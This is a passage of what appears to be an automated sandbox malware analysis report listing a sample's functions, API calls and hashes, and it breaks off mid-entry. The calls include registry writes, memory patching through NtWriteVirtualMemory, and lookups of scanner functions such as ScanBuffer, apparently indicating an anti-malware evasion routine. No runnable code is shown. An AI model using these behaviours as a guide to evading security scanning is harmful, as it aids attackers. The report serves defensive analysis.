                                                                                                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 503785936-0
                                                                                                                        • Opcode ID: d297b48548f5a849673246126baa6ec63bf6d880a20ed8aeb61043ba8dfcefcf
                                                                                                                        • Instruction ID: 641ac528a66a7c88a5adac827e7ca73990c68730e4f59b2e3b63bd6f6582bbef
                                                                                                                        • Opcode Fuzzy Hash: d297b48548f5a849673246126baa6ec63bf6d880a20ed8aeb61043ba8dfcefcf
                                                                                                                        • Instruction Fuzzy Hash: 56318F70E006099FDB01EFA8D981BAEB7F6EF49700F908465E504AB390DB756E048FB1
                                                                                                                        Function 02D4F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02EABA58), ref: 02D4F258
                                                                                                                        • RegSetValueExA.ADVAPI32(000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,02D4F2C3), ref: 02D4F290
                                                                                                                        • RegCloseKey.ADVAPI32(000008D8,000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,02D4F2C3), ref: 02D4F29B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 779948276-0
                                                                                                                        • Opcode ID: 8f452e3c8b13819f9d0326c65911cf9010e3344ffce29fef40330558b9e4a59d
                                                                                                                        • Instruction ID: dedcf9a3d81203fcd777eb2a187bddb9bb486b6ec958b1158d7828d0bfdb260d
                                                                                                                        • Opcode Fuzzy Hash: 8f452e3c8b13819f9d0326c65911cf9010e3344ffce29fef40330558b9e4a59d
                                                                                                                        • Instruction Fuzzy Hash: DC112B72A40244AFEB01EFA9D88199A7BEDEB08700F414569B505D7750DA34EE408F74
                                                                                                                        Function 02D4F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyA.ADVAPI32(?,00000000,02EABA58), ref: 02D4F258
                                                                                                                        • RegSetValueExA.ADVAPI32(000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,02D4F2C3), ref: 02D4F290
                                                                                                                        • RegCloseKey.ADVAPI32(000008D8,000008D8,00000000,00000000,00000001,00000000,0000001C,00000000,02D4F2C3), ref: 02D4F29B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 779948276-0
                                                                                                                        • Opcode ID: b3e1059b86609d89be4046b51e8f0f5ea04d3424fcbe69f7c0e48ad07c620dec
                                                                                                                        • Instruction ID: a22389e99f17b50998414b383a51f6f1b29004dcc61bc0bb304b437ff6d82cb6
                                                                                                                        • Opcode Fuzzy Hash: b3e1059b86609d89be4046b51e8f0f5ea04d3424fcbe69f7c0e48ad07c620dec
                                                                                                                        • Instruction Fuzzy Hash: 43113A72A40244AFEB02EFA9E881E9E7BEDEB08700F414569B505D7750DB34EE408FB4
                                                                                                                        Function 02D3E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ClearVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1473721057-0
                                                                                                                        • Opcode ID: c4ea0658458a8013d24bea34a0eb0ac453f6a3f31b2075eacce33bf0dc010217
                                                                                                                        • Instruction ID: 7d58df561cffc866595b24b6bb189d28b28d93bcdc1c9a7cb06618ff9dc7f079
                                                                                                                        • Opcode Fuzzy Hash: c4ea0658458a8013d24bea34a0eb0ac453f6a3f31b2075eacce33bf0dc010217
                                                                                                                        • Instruction Fuzzy Hash: ABF0CD2171A110C79B237B39DD846AA279A9F40342B145836B4C6AB3C6CBB9CC45CBB2
                                                                                                                        Function 02D34D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(02D4F4A4), ref: 02D34C6E
                                                                                                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 02D34D5B
                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 02D34D6D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: String$Free$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 986138563-0
                                                                                                                        • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                        • Instruction ID: 2c0cf7ec9dccd593fd2a05a80f90b38be7ef776467e1c4a500f485e8e95c5bee
                                                                                                                        • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                        • Instruction Fuzzy Hash: D4E0ECBC2052065EEA166F21DD41A36262AEFC1754F14C499A840CA354DB7CDC40AD38
                                                                                                                        Function 02D470DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysFreeString.OLEAUT32(?), ref: 02D473DA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID: H
                                                                                                                        • API String ID: 3341692771-2852464175
                                                                                                                        • Opcode ID: fd49e1365938428de8197f8916c26a6a802590abb0963e6ac34e8cfe5ca0467c
                                                                                                                        • Instruction ID: 46b6b81dac0a2bb1240accdf55d7b32d95a71dbfda7978d02f3cc2437bcdc54a
                                                                                                                        • Opcode Fuzzy Hash: fd49e1365938428de8197f8916c26a6a802590abb0963e6ac34e8cfe5ca0467c
                                                                                                                        • Instruction Fuzzy Hash: 88B1BE74A016089FEB15CFA9E484A9DFBF6FF89314F248169E855AB360DB30AC45CF50
                                                                                                                        Function 02D3E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 02D3E781
                                                                                                                          • Part of subcall function 02D3E364: VariantClear.OLEAUT32(?), ref: 02D3E373
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCopy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 274517740-0
                                                                                                                        • Opcode ID: b3efd9deaa7027cf286d44fd33338d465bdda2a718ebd0b2b06445fe5d1741d0
                                                                                                                        • Instruction ID: 2eefe0bf0dd4e6b7a9227461812c9e83c7dccad157217553ccfc55f26453a5b7
                                                                                                                        • Opcode Fuzzy Hash: b3efd9deaa7027cf286d44fd33338d465bdda2a718ebd0b2b06445fe5d1741d0
                                                                                                                        • Instruction Fuzzy Hash: 8011A161B1021497DB33AF29D9C8A6677DAEF84750B108466E58A9B3D5EB30CC41CA72
                                                                                                                        Function 02D3E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InitVariant
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1927566239-0
                                                                                                                        • Opcode ID: 104a7cd4bdd661c9eb7cbc3aea24b965843119e36a0f446ea5e25e76aebc3b2d
                                                                                                                        • Instruction ID: c542f6c39033d170279c4dbea2d4181c6ec001656d55c295c8b4014078490b44
                                                                                                                        • Opcode Fuzzy Hash: 104a7cd4bdd661c9eb7cbc3aea24b965843119e36a0f446ea5e25e76aebc3b2d
                                                                                                                        • Instruction Fuzzy Hash: 1C313E72A00218EBDB12DFA8D984AAA77E9EF4C324F444565F945D3390D734DD50CBA1
                                                                                                                        Function 02D489D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D4823C,?,?,00000000,?,02D47A7E,ntdll,00000000,00000000,02D47AC3,?,?,00000000), ref: 02D4820A
                                                                                                                          • Part of subcall function 02D481CC: GetModuleHandleA.KERNELBASE(?), ref: 02D4821E
                                                                                                                          • Part of subcall function 02D48274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D482FC,?,?,00000000,00000000,?,02D48215,00000000,KernelBASE,00000000,00000000,02D4823C), ref: 02D482C1
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D482C7
                                                                                                                          • Part of subcall function 02D48274: GetProcAddress.KERNEL32(?,?), ref: 02D482D9
                                                                                                                          • Part of subcall function 02D47D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
                                                                                                                          • Part of subcall function 02D48338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02D483C2), ref: 02D483A4
                                                                                                                        • FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1478290883-0
                                                                                                                        • Opcode ID: ad84e352ca2e5853e2fcc358f60432296f5d43a815b07186607647a2ab6377d4
                                                                                                                        • Instruction ID: a981da06e69e6ea05374d2356f75d88dca900483a6877da5cc1f54161babf7ed
                                                                                                                        • Opcode Fuzzy Hash: ad84e352ca2e5853e2fcc358f60432296f5d43a815b07186607647a2ab6377d4
                                                                                                                        • Instruction Fuzzy Hash: 7A213E71A80300EBFB42FBA4EC16B9EB7AADB44740F500865B955E73C0DA74AD009F78
                                                                                                                        Function 02D46D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,02D46DB9,?,?,?,00000000), ref: 02D46D99
                                                                                                                          • Part of subcall function 02D34C60: SysFreeString.OLEAUT32(02D4F4A4), ref: 02D34C6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeFromProgString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4225568880-0
                                                                                                                        • Opcode ID: af0e40ff91f219eee1e5f1dfa55a223ba63485176a56c3e9a3bc27a3603e18c4
                                                                                                                        • Instruction ID: de7e914f03e7d5ac7763eb70d30b2b92dd92c30b8ca467679535ed169f6bf716
                                                                                                                        • Opcode Fuzzy Hash: af0e40ff91f219eee1e5f1dfa55a223ba63485176a56c3e9a3bc27a3603e18c4
                                                                                                                        • Instruction Fuzzy Hash: 84E06D76604608BBE712EB66FC51D9E77EDDF8A710F5144B1E901A3710EA79AE0488B0
                                                                                                                        Function 02D35868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(02D30000,?,00000105), ref: 02D35886
                                                                                                                          • Part of subcall function 02D35ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02D30000,02D5E790), ref: 02D35AE8
                                                                                                                          • Part of subcall function 02D35ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D30000,02D5E790), ref: 02D35B06
                                                                                                                          • Part of subcall function 02D35ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02D30000,02D5E790), ref: 02D35B24
                                                                                                                          • Part of subcall function 02D35ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02D35B42
                                                                                                                          • Part of subcall function 02D35ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02D35BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02D35B8B
                                                                                                                          • Part of subcall function 02D35ACC: RegQueryValueExA.ADVAPI32(?,02D35D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02D35BD1,?,80000001), ref: 02D35BA9
                                                                                                                          • Part of subcall function 02D35ACC: RegCloseKey.ADVAPI32(?,02D35BD8,00000000,?,?,00000000,02D35BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02D35BCB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2796650324-0
                                                                                                                        • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                        • Instruction ID: 9ed6749d2f7b92169a5d79048a4e70116b712e8e8c9da7b715190852a229079a
                                                                                                                        • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                        • Instruction Fuzzy Hash: C7E065B1A013148FCB51DEA8D8C0B9633D8AB08750F4409A1EC68CF34AD7B1DE208BE0
                                                                                                                        Function 02D37DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02D37DF4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3934441357-0
                                                                                                                        • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                        • Instruction ID: b33909245cec96185b939d2750d169b16ee10ecf44d8513ce4cf5c46e0592525
                                                                                                                        • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                        • Instruction Fuzzy Hash: B1D05BF23091507AE225965B9D44EA75BDCCBC6770F10063DF558C7280D720CC01C6B1
                                                                                                                        Function 02D34C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FreeString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3341692771-0
                                                                                                                        • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                        • Instruction ID: 7ea4236288220eaba20a4f47ef52c331b7880b446fabaa067baedc460b79a7e7
                                                                                                                        • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                                                                                        • Instruction Fuzzy Hash: B8C012A66002305BEB225699ECC075262CCDB05294F1440A19404D7354E364DC0086B0
                                                                                                                        Function 02D37E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,?,02D5356F,ScanString,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,ScanBuffer,02DB7380,02D5B7B8,OpenSession,02DB7380,02D5B7B8,Initialize), ref: 02D37E8B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AttributesFile
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3188754299-0
                                                                                                                        • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                        • Instruction ID: 05b37cd57bae146fb5e423abef34a9437140519292f25e69b161051938149148
